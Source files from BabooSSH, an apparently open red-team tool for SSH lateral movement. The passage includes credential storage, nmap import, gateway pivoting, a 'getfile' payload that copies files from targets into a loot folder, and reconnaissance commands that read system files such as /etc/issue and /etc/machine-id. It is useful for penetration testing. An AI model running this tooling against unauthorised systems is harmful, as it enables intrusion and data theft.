from baboossh import Db

class Tag():

    """A tag to apply on endpoints to target them as groups.

    Attributes:
        name (str): the tag name
        endpoints ([:class:`.Endpoint`,...]): the Endpoints tagged with the tag.
    """

    def __init__(self, name):
        from baboossh import Endpoint
        self.name = name
        self.endpoints = []
        cursor = Db.get().cursor()
        for row in cursor.execute('SELECT endpoint FROM tags WHERE name=?', (self.name, )):
            self.endpoints.append(Endpoint.find_one(endpoint_id=row[0]))

    def delete(self):
        """Delete a Tag from the :class:`.Workspace`"""

        for endpoint in self.endpoints:
            endpoint.untag(self.name)

    @classmethod
    def find_all(cls, endpoint=None):
        """Find all Tags corresponding to criteria

        Args:
            endpoint (:class:`.Endpoint`):
                the `Endpoint` the tags are in

        Returns:
            A list of all `Tag` s in the :class:`.Workspace` matching the criteria
        """

        ret = []
        cursor = Db.get().cursor()
        if endpoint is None:
            req = cursor.execute('SELECT DISTINCT(name) FROM tags')
        else:
            req = cursor.execute('SELECT DISTINCT(name) FROM tags WHERE endpoint=?', (endpoint.id,))
        for row in req:
            ret.append(Tag(row[0]))
        cursor.close()
        return ret

    @classmethod
    def find_one(cls, name=None):
        """Find a tag matching the criteria

        Args:
            name (str): the username to search

        Returns:
            A single `Tag` or `None`.
        """

        if name is None:
            return None

        cursor = Db.get().cursor()
        cursor.execute('''SELECT name FROM tags WHERE name=?''', (name, ))
        row = cursor.fetchone()
        cursor.close()
        if row is None:
            return None
        return Tag(row[0])

    def __str__(self):
        return "!"+self.name



import cmd2
from libnmap.parser import NmapParser, NmapParserException
from baboossh.host import Host
from baboossh.endpoint import Endpoint
from baboossh.path import Path

class ExtStr(type):
    def __str__(self):
        return self.getKey()

class BaboosshExt(object,metaclass=ExtStr):
    @classmethod
    def getModType(cls):
        return "import"

    @classmethod
    def getKey(cls):
        return "nmap-xml"

    @classmethod
    def descr(cls):
        return "Import endpoints from NMAP XML output file"

    def params_parser_from(self):
        all_hosts = Host.find_all()
        ret = []
        for host in all_hosts:
            ret.append(host.name)
        ret.append("Local")
        return ret

    @classmethod
    def buildParser(cls,parser):
        parser.add_argument('nmapfile',help='NMAP file path',completer=cmd2.Cmd.path_complete)
        parser.add_argument('from',help='Host from which scan was performed',nargs='?',choices_provider=cls.params_parser_from)

    @classmethod
    def run(cls,stmt,workspace):
        nmapfile = getattr(stmt,'nmapfile')
        from_host = getattr(stmt,'from',"Local")

        if from_host is None:
            print("No source host specified, ignoring paths")
            distance = None
        elif from_host == "Local":
            src = None
            distance = 0
        else:
            host = Host.find_one(name=from_host)
            if host is None:
                print("No host corresponding.")
                return False
            src = host
            distance = src.distance + 1
        try:
            report = NmapParser.parse_fromfile(nmapfile)
        except Exception as e:
            print("Failed to read source file: "+str(e))
            return False
        count = 0
        count_new = 0
        for host in report.hosts:
            for s in host.services:
                if s.service == "ssh" and s.open():
                    count = count + 1
                    new_endpoint = Endpoint(host.address,s.port)
                    if new_endpoint.id is None:
                        count_new = count_new + 1
                    new_endpoint.save()
                    if distance is not None:
                        if new_endpoint.distance is None or new_endpoint.distance > distance:
                            new_endpoint.distance = distance
                            new_endpoint.save()
                        new_path = Path(src,new_endpoint)
                        new_path.save()
        print(str(count)+" endpoints found, "+str(count_new)+" new endpoints saved")
        return True
 



import hashlib
from baboossh import Db
from baboossh.utils import Unique

class User(metaclass=Unique):

    """A username to authenticate with on servers.

    Attributes:
        name (str): the username
        id (int): the User's id
        scope (bool): whether the User is in the scope or not
        found (:class:`.Endpoint`): the endpoint the user was discovered on
    """

    def __init__(self, name):
        self.name = name
        self.id = None
        self.scope = True
        self.found = None
        cursor = Db.get().cursor()
        cursor.execute('SELECT id, scope, found FROM users WHERE username=?', (self.name, ))
        saved_user = cursor.fetchone()
        cursor.close()
        if saved_user is not None:
            self.id = saved_user[0]
            self.scope = saved_user[1] != 0
            if saved_user[2] is not None:
                from baboossh import Endpoint
                self.found = Endpoint.find_one(endpoint_id=saved_user[2])

    @classmethod
    def get_id(cls, name):
        return hashlib.sha256(name.encode()).hexdigest()

    def save(self):
        """Save the user in database

        If the User object has an id it means it is already stored in database,
        so it is updated. Else it is inserted and the id is set in the object.

        """
        cursor = Db.get().cursor()
        if self.id is not None:
            #If we have an ID, the user is already saved in the database : UPDATE
            cursor.execute('''UPDATE users
                SET
                    username = ?,
                    scope = ?,
                    found = ?
                WHERE id = ?''',
                           (self.name, self.scope, self.found.id if self.found is not None else None, self.id))
        else:
            #The user doesn't exists in database : INSERT
            cursor.execute('''INSERT INTO users(username, scope, found)
                VALUES (?, ?, ?) ''',
                           (self.name, self.scope, self.found.id if self.found is not None else None))
            cursor.close()
            cursor = Db.get().cursor()
            cursor.execute('SELECT id FROM users WHERE username=?', (self.name, ))
            self.id = cursor.fetchone()[0]
        cursor.close()
        Db.get().commit()

    def delete(self):
        """Delete a User from the :class:`.Workspace`"""

        from baboossh import Connection
        if self.id is None:
            return {}
        from baboossh.utils import unstore_targets_merge
        del_data = {}
        for connection in Connection.find_all(user=self):
            unstore_targets_merge(del_data, connection.delete())
        cursor = Db.get().cursor()
        cursor.execute('DELETE FROM users WHERE id = ?', (self.id, ))
        cursor.close()
        Db.get().commit()
        unstore_targets_merge(del_data, {"User":[type(self).get_id(self.name)]})
        return del_data

    @classmethod
    def find_all(cls, scope=None, found=None):
        """Find all Users corresponding to criteria

        Args:
            scope (bool):
                List Users in scope (`True`), out of scope (`False`), or both (`None`)
            found (:class:`.Endpoint`):
                the `Endpoint` the users were discovered on

        Returns:
            A list of all `User` s in the :class:`.Workspace` matching the criteria
        """

        ret = []
        cursor = Db.get().cursor()
        if found is None:
            if scope is None:
                req = cursor.execute('SELECT username FROM users')
            else:
                req = cursor.execute('SELECT username FROM users WHERE scope=?', (scope, ))
        else:
            if scope is None:
                req = cursor.execute('SELECT username FROM users WHERE found=?', (found.id if found is not None else None, ))
            else:
                req = cursor.execute('SELECT username FROM users WHERE found=? AND scope=?', (found.id if found is not None else None, scope))
        for row in req:
            ret.append(User(row[0]))
        cursor.close()
        return ret

    @classmethod
    def find_one(cls, user_id=None, name=None):
        """Find a user matching the criteria

        Args:
            user_id (int): the user id to search
            name (str): the username to search

        Returns:
            A single `User` or `None`.
        """

        cursor = Db.get().cursor()
        if user_id is not None:
            cursor.execute('''SELECT username FROM users WHERE id=?''', (user_id, ))
        elif name is not None:
            cursor.execute('''SELECT username FROM users WHERE username=?''', (name, ))
        else:
            cursor.close()
            return None
        row = cursor.fetchone()
        cursor.close()
        if row is None:
            return None
        return User(row[0])

    def __str__(self):
        return self.name



from os.path import join,exists
from os import mkdir
import sys
from baboossh.exceptions import ConnectionClosedError

class ExtStr(type):
    def __str__(self):
        return self.getKey()

class BaboosshExt(object,metaclass=ExtStr):
    @classmethod
    def getModType(cls):
        return "payload"

    @classmethod
    def getKey(cls):
        return "getfile"

    @classmethod
    def descr(cls):
        return "Retrieve file from target"
    
    @classmethod
    def buildParser(cls,parser):
        parser.add_argument('file',help='Path of file to retreive from target')

    @classmethod
    def run(cls, connection, wspaceFolder, stmt):
        if connection.conn is None:
            raise ConnectionClosedError

        lootFolder = join(wspaceFolder,"loot",str(connection.endpoint).replace(':','-'),"")
        if not exists(lootFolder):
            mkdir(lootFolder)
        filepath = getattr(stmt,'file',None)
        if filepath is None:
            print("You must specify a path")
            return False
        #TODO check if file or folder
        print("Retreiving file "+filepath+"... ",end="")
        sys.stdout.flush()
        filedest=join(lootFolder,filepath.replace('/','_'))
        try:
            connection.conn.get(filepath,filedest)
        except Exception as e:
            print("Error "+str(type(e))+": "+str(e))
            return False
        print("Done")
        print("File saved as "+filedest)




"""
BabooSSH : SSH spreading made easy for red teams in a hurry.

For more info see README.rst or documentation
"""

from baboossh.exceptions import *
from baboossh.utils import WORKSPACES_DIR
from baboossh.extensions import *
from baboossh.db import *
from baboossh.creds import *
from baboossh.user import *
from baboossh.host import *
from baboossh.endpoint import *
from baboossh.tunnel import *
from baboossh.path import *
from baboossh.connection import *
from baboossh.shell import *
from baboossh.workspace import *
from baboossh.tag import *



import sqlite3
import threading
import os
from baboossh.utils import WORKSPACES_DIR

class Db():
    """A singleton handling the database connection

    This class allows the use of a single sqlite connection for earch thread
    """

    __conn = None
    __threadsConn = {}
    __workspace = None

    @classmethod
    def get(cls):
        """Returns the database connection for the current thread

        If the current thread isn't the main and no connection is already
        opened, opens a new one and returns it

        Returns:
            An open :class:`sqlite3.Connection`
        """

        main_thread_name = threading.main_thread().getName()
        current_thread_name = threading.currentThread().getName()
        if current_thread_name != main_thread_name:
            if current_thread_name in cls.__threadsConn.keys():
                return cls.__threadsConn[current_thread_name]
            cls.connect(cls.__workspace)
            return cls.__threadsConn[current_thread_name]
        if cls.__conn is None:
            raise ValueError("Trying to use unconnected database")
        return cls.__conn

    @classmethod
    def build(cls, workspace):
        """Create the databases and the tables for a new :class:`Workspace`

        Args:
            workspace (str): the workspace's name
        """

        db_path = os.path.join(WORKSPACES_DIR, workspace, "workspace.db")
        connection = sqlite3.connect(db_path)
        connection.execute('''CREATE TABLE hosts (
            id INTEGER PRIMARY KEY ASC,
            name TEXT NOT NULL UNIQUE,
            hostname TEXT,
            uname TEXT,
            issue TEXT,
            machine_id TEXT,
            macs TEXT
            )''')
        connection.execute('''CREATE TABLE endpoints (
            id INTEGER PRIMARY KEY ASC,
            scope INTEGER NOT NULL,
            host INTEGER,
            ip TEXT NOT NULL,
            port TEXT NOT NULL,
            reachable INTEGER,
            distance INTEGER,
            found INTEGER,
            FOREIGN KEY(found) REFERENCES endpoints(id),
            FOREIGN KEY(host) REFERENCES hosts(id)
            )''')
        connection.execute('''CREATE TABLE users (
            id INTEGER PRIMARY KEY ASC,
            scope INTEGER NOT NULL,
            username TEXT NOT NULL,
            found INTEGER,
            FOREIGN KEY(found) REFERENCES endpoints(id)
            )''')
        connection.execute('''CREATE TABLE creds (
            id INTEGER PRIMARY KEY ASC,
            scope INTEGER NOT NULL,
            type TEXT NOT NULL,
            content TEXT NOT NULL,
            identifier TEXT NOT NULL,
            found INTEGER,
            FOREIGN KEY(found) REFERENCES endpoints(id)
            )''')
        connection.execute('''CREATE TABLE connections (
            id INTEGER PRIMARY KEY ASC,
            root INTEGER NOT NULL,
            endpoint INTEGER NOT NULL,
            user INTEGER NOT NULL,
            cred INTEGER,
            FOREIGN KEY(endpoint) REFERENCES endpoints(id)
            FOREIGN KEY(user) REFERENCES users(id)
            FOREIGN KEY(cred) REFERENCES creds(id)
            )''')
        connection.execute('''CREATE TABLE paths (
            id INTEGER PRIMARY KEY ASC,
            src INTEGER NOT NULL,
            dst INTEGER NOT NULL,
            FOREIGN KEY(src) REFERENCES hosts(id)
            FOREIGN KEY(dst) REFERENCES endpoints(id)
            )''')
        connection.execute('''CREATE TABLE tags (
            name INTEGER NOT NULL,
            endpoint INTEGER NOT NULL,
            FOREIGN KEY(endpoint) REFERENCES endpoints(id),
            UNIQUE(name, endpoint)
            )''')
            
        connection.commit()
        connection.close()

    @classmethod
    def connect(cls, workspace):
        """Open the connection to the database for a :class:`Workspace`

        If this function is called from the main thread, it closes existing
        sqlite connections and opens a new one. Else, if a connection isn't
        already open for the current thread, it opens the connection.

        Args:
            workspace (str): the name of the Workspace to open

        Raises:
            ValueError: raised if the database file doesn't exist
        """

        db_path = os.path.join(WORKSPACES_DIR, workspace, "workspace.db")
        main_thread_name = threading.main_thread().getName()
        current_thread_name = threading.currentThread().getName()
        if current_thread_name != main_thread_name:
            if current_thread_name in cls.__threadsConn.keys():
                return
            cls.__threadsConn[current_thread_name] = sqlite3.connect(db_path)
            return
        if cls.__conn is not None:
            cls.__conn.close()
        cls.__workspace = workspace
        if not os.path.exists(db_path):
            raise ValueError("Workspace database not found, the workspace must be corrupted !")
        cls.__conn = sqlite3.connect(db_path)

    @classmethod
    def close(cls):
        """Closes the connection for the current Thread"""

        main_thread_name = threading.main_thread().getName()
        current_thread_name = threading.currentThread().getName()
        if current_thread_name != main_thread_name:
            if current_thread_name in cls.__threadsConn.keys():
                cls.__threadsConn[current_thread_name].close()
                del cls.__threadsConn[current_thread_name]
            return
        cls.__conn.close()
        cls.__conn = None



import hashlib
from baboossh import Db, Extensions
from baboossh.utils import Unique


class Creds(metaclass=Unique):
    """The credentials to authenticate with on servers.

    The Creds class is an interface to handle various :class:`Extension` s for
    different authentication methods. It provides a set of methods that are
    agnostic of the underlying method, and delegate dedicated work to the
    corresponding :class:`Extension`

    Attributes:
        creds_type (str): the key of the corresponding authentication method
            extension
        creds_content (str): the credentials content as serialized by the method's
            extension class
        obj (Object): the credentials as an Object corresponding to its type
        id (int): the credentials id
        scope (bool): Whether the `Creds` is in scope or not
        found (:class:`.Endpoint`): The Endpoint on which the `Creds` was discovered
    """

    def __init__(self, creds_type, creds_content):
        self.creds_type = creds_type
        self.creds_content = creds_content
        self.obj = Extensions.auths[creds_type](creds_content)
        self.id = None
        self.scope = True
        self.found = None
        cursor = Db.get().cursor()
        cursor.execute('SELECT id, scope, found FROM creds WHERE type=? AND identifier=?', (self.creds_type, self.obj.identifier))
        saved_creds = cursor.fetchone()
        cursor.close()
        if saved_creds is not None:
            self.id = saved_creds[0]
            self.scope = saved_creds[1] != 0
            if saved_creds[2] is not None:
                from baboossh import Endpoint
                self.found = Endpoint.find_one(endpoint_id=saved_creds[2])

    @classmethod
    def get_id(cls, creds_type, creds_content):
        obj = Extensions.auths[creds_type](creds_content)
        return hashlib.sha256((creds_type+obj.identifier).encode()).hexdigest()

    def save(self):
        """Save the `Creds` to the :class:`Workspace` 's database"""
        cursor = Db.get().cursor()
        if self.id is not None:
            #If we have an ID, the creds is already saved in the database : UPDATE
            cursor.execute('''UPDATE creds
                SET
                    type = ?,
                    content = ?,
                    identifier = ?,
                    scope = ?,
                    found = ?
                WHERE id = ?''',
                           (self.creds_type, self.creds_content, self.obj.identifier, self.scope, self.found.id if self.found is not None else None, self.id))
        else:
            #The creds doesn't exists in database : INSERT
            cursor.execute('''INSERT INTO creds(type, content, identifier, scope, found)
                VALUES (?, ?, ?, ?, ?) ''',
                           (self.creds_type, self.creds_content, self.obj.identifier, self.scope, self.found.id if self.found is not None else None))
            cursor.close()
            cursor = Db.get().cursor()
            cursor.execute('SELECT id FROM creds WHERE type=? and identifier=?', (self.creds_type, self.obj.identifier))
            self.id = cursor.fetchone()[0]
        cursor.close()
        Db.get().commit()

    def delete(self):
        """Delete a `Creds` from the :class:`.Workspace`"""
        from baboossh import Connection
        if self.id is None:
            return {}
        from baboossh.utils import unstore_targets_merge
        del_data = {}
        for connection in Connection.find_all(creds=self):
            unstore_targets_merge(del_data, connection.delete())
        self.obj.delete()
        cursor = Db.get().cursor()
        cursor.execute('DELETE FROM creds WHERE id = ?', (self.id, ))
        cursor.close()
        Db.get().commit()
        unstore_targets_merge(del_data, {"Creds":[type(self).get_id(self.creds_type, self.creds_content)]})
        return del_data

    @property
    def kwargs(self):
        """Return the `Creds` as a dict compatible with `fabric.Connection`"""
        return self.obj.getKwargs()

    @classmethod
    def find_all(cls, scope=None, found=None):
        """Find all `Creds`

        Args:
            scope (bool): List `Creds` in scope (`True`), out of scope
                (`False`), or both (`None`)
            found (:class:`Endpoint`):
                the `Endpoint` the `Creds` were discovered on

        Returns:
            A list of all `Creds` in the :class:`.Workspace`
        """

        ret = []
        cursor = Db.get().cursor()
        if found is None:
            if scope is None:
                req = cursor.execute('SELECT type, content FROM creds')
            else:
                req = cursor.execute('SELECT type, content FROM creds WHERE scope=?', (scope, ))
        else:
            if scope is None:
                req = cursor.execute('SELECT type, content FROM creds WHERE found=?', (found.id, ))
            else:
                req = cursor.execute('SELECT type, content FROM creds WHERE found=? AND scope=?', (found.id, scope))
        for row in req:
            ret.append(Creds(row[0], row[1]))
        return ret

    @classmethod
    def find_one(cls, creds_id):
        """Find a `Creds` by its id

        Args:
            creds_id (int): the `Creds` id to search

        Returns:
            A single `Creds` or `None`.
        """

        cursor = Db.get().cursor()
        cursor.execute('''SELECT type, content FROM creds WHERE id=?''', (creds_id, ))
        row = cursor.fetchone()
        cursor.close()
        if row is None:
            return None
        return Creds(row[0], row[1])

    def show(self):
        """Show the `Creds` object and its parameters"""
        self.obj.show()

    def edit(self):
        """Edit the `Creds` object parameters"""
        self.obj.edit()
        self.creds_content = self.obj.serialize()
        self.save()

    def __str__(self):
        return "#"+str(self.id)



import os

WORKSPACES_DIR = os.path.join(os.path.expanduser("~"), ".baboossh")
BABOOSSH_VERSION = "1.1.1"

class Unique(type):
    def __call__(cls, *args, **kwargs):
        from baboossh.workspace import Workspace
        if Workspace.active is None:
            raise ValueError("Cannot create an object out of a workspace")
        workspace = Workspace.active
        obj_id = cls.get_id(*args, **kwargs)
        if obj_id not in workspace.store[cls.__name__]:
            self = cls.__new__(cls, *args, **kwargs)
            cls.__init__(self, *args, **kwargs)
            workspace.store[cls.__name__][obj_id] = self
        return workspace.store[cls.__name__][obj_id]

    def __init__(cls, name, bases, attributes):
        super().__init__(name, bases, attributes)

def unstore_targets_merge(original, new_data):
    for obj_type, obj_list in new_data.items():
        if obj_type in original:
            original[obj_type] = [*original[obj_type], *obj_list]
        else:
            original[obj_type] = obj_list

def is_workspace_compat(workspace_version):
    if BABOOSSH_VERSION == workspace_version:
        return True

    b_major, b_minor, b_patch = BABOOSSH_VERSION.split(".")
    w_major, w_minor, w_patch = workspace_version.split(".")
    if b_major == "1":
        if w_major != "1":
            return False
        if b_minor == "1":
            if w_minor in ["1", "2"]:
                return True
    return False



import hashlib
import paramiko
import fabric
from baboossh import Db, Endpoint, User, Creds, Path, Host, Tag
from baboossh.exceptions import *
from baboossh.utils import Unique
import socket

try:
    from invoke.vendor.six import string_types
except ImportError:
    from six import string_types

def monkey_open_gateway(self):
    """
    This is a monkey patch of fabric.Connection.open_gateway which simply
    forwards the timeout to the call on open_channel
    """

    if isinstance(self.gateway, string_types):
        ssh_conf = SSHConfig()
        dummy = "Host {}\n    ProxyCommand {}"
        ssh_conf.parse(StringIO(dummy.format(self.host, self.gateway)))
        return ProxyCommand(ssh_conf.lookup(self.host)["proxycommand"])
    self.gateway.open()
    return self.gateway.transport.open_channel(
        kind="direct-tcpip",
        dest_addr=(self.host, int(self.port)),
        src_addr=("", 0),
        timeout=self.connect_timeout
    )

fabric.Connection.open_gateway = monkey_open_gateway

class Connection(metaclass=Unique):
    """A :class:`User` and :class:`Creds` to authenticate on an :class:`Endpoint`

    A connection represents the working association of those 3 objects to connect
    a target. It can be used to run payloads on a :class:`Host`, open a
    :class:`Tunnel` to it or use it as a pivot to reach new :class:`Endpoint` s

    Attributes:
        endpoint (:class:`Endpoint`): the `Connection` 's endpoint
        user (:class:`User`): the `Connection` 's user
        creds (:class:`Creds`): the `Connection` 's credentials
        id (int): the `Connection` 's id
        used_by_connections ([Connection,...]): a list of :class:`Connection`
            using the current one as a pivot. Used for recursive connection
            closure.
        used_by_tunnels ([Tunnel,...]): a list of :class:`Tunnel`
            using the current connection as a pivot. Used for recursive connection
            closure.
    """


    def __init__(self, endpoint, user, cred):
        """Create the object and fetches info from database if it has been saved.
        
        Args:
            endpoint (:class:`Endpoint`): The Connection's endpoint
            user (:class:`User`): The Connection's user
            cred (:class:`Creds`): The Connection's credentials
        """

        self.endpoint = endpoint
        self.user = user
        self.creds = cred
        self.id = None
        self.root = False
        self.conn = None
        self.used_by_connections = []
        self.used_by_tunnels = []
        if user is None or cred is None:
            return
        cursor = Db.get().cursor()
        cursor.execute('SELECT id, root FROM connections WHERE endpoint=? AND user=? AND cred=?', (self.endpoint.id, self.user.id, self.creds.id))
        saved_connection = cursor.fetchone()
        cursor.close()
        if saved_connection is not None:
            self.id = saved_connection[0]
            self.root = saved_connection[1] != 0

    @classmethod
    def get_id(cls, endpoint, user, cred):
        """Generate an ID for unicity
        
        Args: See __init__

        Returns:
            A str corresponding to the Connection hash
        """
        return hashlib.sha256((str(endpoint)+str(user)+str(cred)).encode()).hexdigest()

    @property
    def scope(self):
        """Returns whether the `Connection` is in scope

        The `Connection` is in scope if its :class:`User`, its :class:`Creds`
        AND it :class:`Endpoint` are all in scope
        """

        return self.user.scope and self.endpoint.scope and self.creds.scope

    @property
    def distance(self):
        """Returns the number of hops between `"Local"` and the :class:`Endpoint`"""
        return self.endpoint.distance

    def save(self):
        """Save the `Connection` to the :class:`Workspace`'s database"""

        if self.user is None or self.creds is None:
            return
        cursor = Db.get().cursor()
        if self.id is not None:
            #If we have an ID, the endpoint is already saved in the database : UPDATE
            cursor.execute('''UPDATE connections
                SET
                    endpoint= ?,
                    user = ?,
                    cred = ?,
                    root = ?
                WHERE id = ?''',
                           (self.endpoint.id, self.user.id, self.creds.id, self.root, self.id))
        else:
            #The endpoint doesn't exists in database : INSERT
            cursor.execute('''INSERT INTO connections(endpoint, user, cred, root)
                VALUES (?, ?, ?, ?) ''',
                           (self.endpoint.id, self.user.id, self.creds.id, self.root))
            cursor.close()
            cursor = Db.get().cursor()
            cursor.execute('SELECT id FROM connections WHERE endpoint=? AND user=? AND cred=?', (self.endpoint.id, self.user.id, self.creds.id))
            self.id = cursor.fetchone()[0]
        cursor.close()
        Db.get().commit()

    def delete(self):
        """Delete the `Connection` from the :class:`Workspace`'s database"""

        if self.id is None:
            return {}
        cursor = Db.get().cursor()
        cursor.execute('DELETE FROM connections WHERE id = ?', (self.id, ))
        cursor.close()
        Db.get().commit()
        return {"Connection":[type(self).get_id(self.endpoint, self.user, self.creds)]}


    @classmethod
    def find_one(cls, connection_id=None, endpoint=None, scope=None, gateway_to=None):
        """Find a `Connection` by its id, endpoint or if it can be used as a gateway to an :class:`Endpoint`

        Args:
            connection_id (int): the `Connection` id to search
            endpoint (:class:`Endpoint`): the `Connection` endpoint to search
            gateway_to (:class:`Endpoint`): the Endpoint to which you want to find a gateway
            scope (bool): whether to include only in scope Connections (`True`), out of scope Connections (`False`) or both (`None`)

        Returns:
            A single `Connection` or `None`.
        """

        if gateway_to is not None:
            if gateway_to.distance is not None and gateway_to.distance == 0:
                return None
            try:
                closest_host = Host.find_one(prev_hop_to=gateway_to)
            except NoPathError as exc:
                raise exc
            if closest_host is None:
                return None
            return cls.find_one(endpoint=closest_host.closest_endpoint, scope=True)

        cursor = Db.get().cursor()
        if connection_id is not None:
            req = cursor.execute('SELECT endpoint, user, cred FROM connections WHERE id=?', (connection_id, ))
        elif endpoint is not None:
            req = cursor.execute('SELECT endpoint, user, cred FROM connections WHERE endpoint=? ORDER BY root ASC', (endpoint.id, ))
        else:
            cursor.close()
            return None
        if scope is None:
            row = cursor.fetchone()
            cursor.close()
            if row is None:
                return None
            return Connection(Endpoint.find_one(endpoint_id=row[0]), User.find_one(user_id=row[1]), Creds.find_one(creds_id=row[2]))
        for row in req:
            conn = Connection(Endpoint.find_one(endpoint_id=row[0]), User.find_one(user_id=row[1]), Creds.find_one(creds_id=row[2]))
            if scope == conn.scope:
                cursor.close()
                return conn
        cursor.close()
        return None


    @classmethod
    def find_all(cls, endpoint=None, user=None, creds=None, scope=None):
        """Find all `Connection` matching the criteria

        If two or more arguments are specified, the returned Connections must match each ("AND")

        Args:
            endpoint (:class:`Endpoint` or :class:`Tag`): the `Connection` endpoint to search or a :class:`Tag` of endpoints to search
            user (:class:`User`): the `Connection` user to search
            creds (:class:`Creds`): the `Connection` creds to search
            scope (bool): whether to include only in scope Connections (`True`), out of scope Connections (`False`) or both (`None`)

        Returns:
            A list of matching `Connection`.
        """


        ret = []
        cursor = Db.get().cursor()

        query = 'SELECT endpoint, user, cred FROM connections'
        params = []
        first = True
        if endpoint is not None and not isinstance(endpoint, Tag):
            if first:
                query = query + ' WHERE '
                first = False
            else:
                query = query + ' AND '
            query = query + 'endpoint=?'
            params.append(endpoint.id)
        elif endpoint is not None and isinstance(endpoint, Tag):
            if first:
                query = query + ' WHERE ('
                first = False
            else:
                query = query + ' AND ('
            first_endpoint = True
            for end in endpoint.endpoints:
                if not first_endpoint:
                    query = query + ' OR '
                else:
                    first_endpoint = False
                query = query + 'endpoint=?'
                params.append(end.id)
            query = query + ' )'
        if user is not None:
            if first:
                query = query + ' WHERE '
                first = False
            else:
                query = query + ' AND '
            query = query + 'user=?'
            params.append(user.id)
        if creds is not None:
            if first:
                query = query + ' WHERE '
                first = False
            else:
                query = query + ' AND '
            query = query + 'cred=?'
            params.append(creds.id)

        req = cursor.execute(query, tuple(params))

        for row in req:
            conn = Connection(Endpoint.find_one(endpoint_id=row[0]), User.find_one(user_id=row[1]), Creds.find_one(creds_id=row[2]))
            if scope is None or conn.scope == scope:
                ret.append(conn)
        cursor.close()
        return ret

    @classmethod
    def from_target(cls, arg):
        if '@' in arg and ':' in arg:
            auth, sep, endpoint = arg.partition('@')
            endpoint = Endpoint.find_one(ip_port=endpoint)
            if endpoint is None:
                raise ValueError("Supplied endpoint isn't in workspace")
            user, sep, cred = auth.partition(":")
            if sep == "":
                raise ValueError("No credentials supplied")
            user = User.find_one(name=user)
            if user is None:
                raise ValueError("Supplied user isn't in workspace")
            if cred[0] == "#":
                cred = cred[1:]
            cred = Creds.find_one(creds_id=cred)
            if cred is None:
                raise ValueError("Supplied credentials aren't in workspace")
            return Connection(endpoint, user, cred)

        if ':' not in arg:
            arg = arg+':22'
        endpoint = Endpoint.find_one(ip_port=arg)
        if endpoint is None:
            raise ValueError("Supplied endpoint isn't in workspace")
        connection = cls.find_one(endpoint=endpoint)
        if connection is None:
            raise ValueError("No working connection for supplied endpoint")
        return connection

    def identify(self, socket):
        """Indentify the host"""
        try:
            result = socket.run("hostname", hide='both', warn = True)
            hostname = result.stdout.rstrip()
            result = socket.run("uname -a", hide='both', warn = True)
            uname = result.stdout.rstrip()
            result = socket.run("cat /etc/issue", hide='both', warn = True)
            issue = result.stdout.rstrip()
            result = socket.run("cat /etc/machine-id", hide='both', warn = True)
            machine_id = result.stdout.rstrip()
            result = socket.run("for i in `ls -l /sys/class/net/ | grep -v virtual | grep 'devices' | tr -s '[:blank:]' | cut -d ' ' -f 9 | sort`; do ip l show $i | grep ether | tr -s '[:blank:]' | cut -d ' ' -f 3; done", hide='both', warn = True)
            mac_str = result.stdout.rstrip()
            macs = mac_str.split()
            new_host = Host(hostname, uname, issue, machine_id, macs)
            if new_host.id is None:
                print("\t"+str(self)+" is a new host: " + new_host.name)
            else:
                print("\t"+str(self)+" is an existing host: " + new_host.name)
                if not new_host.scope:
                    self.endpoint.scope = False
            new_host.save()
            self.endpoint.host = new_host
            self.endpoint.save()
        except Exception as exc:
            print("Error : "+str(exc))
            return False
        return True

    def probe(self, gateway="auto", verbose=True):
        if verbose:
            print("Reaching \033[1;34m"+str(self.endpoint)+"\033[0m > ", end="", flush=True)
        if gateway is not None:
            if gateway == "auto":
                gateway = Connection.find_one(gateway_to=self.endpoint)
                if gateway is not None:
                    if not gateway.open(verbose=False):
                        raise ConnectionClosedError("Could not open gateway "+str(gateway))
                    gw = gateway.conn
                else:
                    gw = None
            else:
                if not gateway.open(verbose=False):
                    raise ConnectionClosedError("Could not open gateway "+str(gateway))
                gw = gateway.conn
        else:
            gw = None

        paramiko_args = {'look_for_keys':False, 'allow_agent':False}

        conn = fabric.Connection(host=self.endpoint.ip, port=self.endpoint.port, user="user", connect_kwargs=paramiko_args, gateway=gw, connect_timeout=3)
        try:
            conn.open()
        except paramiko.ssh_exception.NoValidConnectionsError:
            if verbose:
                print("\033[1;31mKO\033[0m.")
            return False
        except paramiko.ssh_exception.ChannelException:
            if verbose:
                print("\033[1;31mKO\033[0m.")
            return False
        except paramiko.ssh_exception.SSHException as exc:
            if "Timeout" in str(exc) or "Error reading SSH protocol banner" in str(exc):
                if verbose:
                    print("\033[1;31mKO\033[0m.")
                return False
            if "No existing session" in str(exc):
                if verbose:
                    print("\033[1;31mKO\033[0m. No matching cipher")
                return False
            if "No authentication methods available" in str(exc):
                pass
            else:
                raise exc
        except socket.timeout:
            if verbose:
                print("\033[1;31mKO\033[0m.")
            return False

        if conn is not None:
            conn.close()

        if verbose:
            print("\033[1;32mOK\033[0m")

        self.endpoint.reachable = True
        new_distance = 1 if gw is None else gateway.endpoint.distance + 1
        if self.endpoint.distance is None or self.endpoint.distance > new_distance:
            self.endpoint.distance = new_distance
        self.endpoint.save()
        return True

    def open(self, verbose=False, target=False):
        if self.conn is not None:
            if target:
                print("Connection to \033[1;34m"+str(self)+"\033[0m already open. > \033[1;32mOK\033[0m")
            return True

        hostname = ""
        if self.endpoint.host is not None:
            hostname = " ("+str(self.endpoint.host)+")"
        if target:
            print("Connecting to \033[1;34m"+str(self)+"\033[0m"+hostname+" > ", end="", flush=True)

        gateway = Connection.find_one(gateway_to=self.endpoint)
        if gateway is not None:
            if not gateway.open(verbose=verbose):
                raise ConnectionClosedError("Could not open gateway "+str(gateway))
            gw = gateway.conn
        else:
            gw = None

        try:
            paramiko_args = {**self.creds.kwargs, 'look_for_keys':False, 'allow_agent':False}
        except ValueError as exc:
            if target:
                print("\033[1;31mKO\033[0m. "+str(exc))
            return False
        conn = fabric.Connection(host=self.endpoint.ip, port=self.endpoint.port, user=self.user.name, connect_kwargs=paramiko_args, gateway=gw, connect_timeout=3)
        try:
            conn.open()
        except paramiko.ssh_exception.NoValidConnectionsError:
            if target:
                print("\033[1;31mKO\033[0m. Could not reach destination.")
            if gw is not None:
                #TODO remove path
                pass
            return False
        except (paramiko.ssh_exception.AuthenticationException, paramiko.ssh_exception.SSHException) as exc:
            if isinstance(exc, paramiko.ssh_exception.AuthenticationException) or "encountered" in str(exc):
                if target:
                    print("\033[1;31mKO\033[0m. Authentication failed.")
                return False
            raise exc
        except socket.timeout:
            if verbose:
                print("\033[1;31mKO\033[0m. Could not open socket to "+str(self.endpoint))
            return False


        if target:
            print("\033[1;32mOK\033[0m")
        elif verbose:
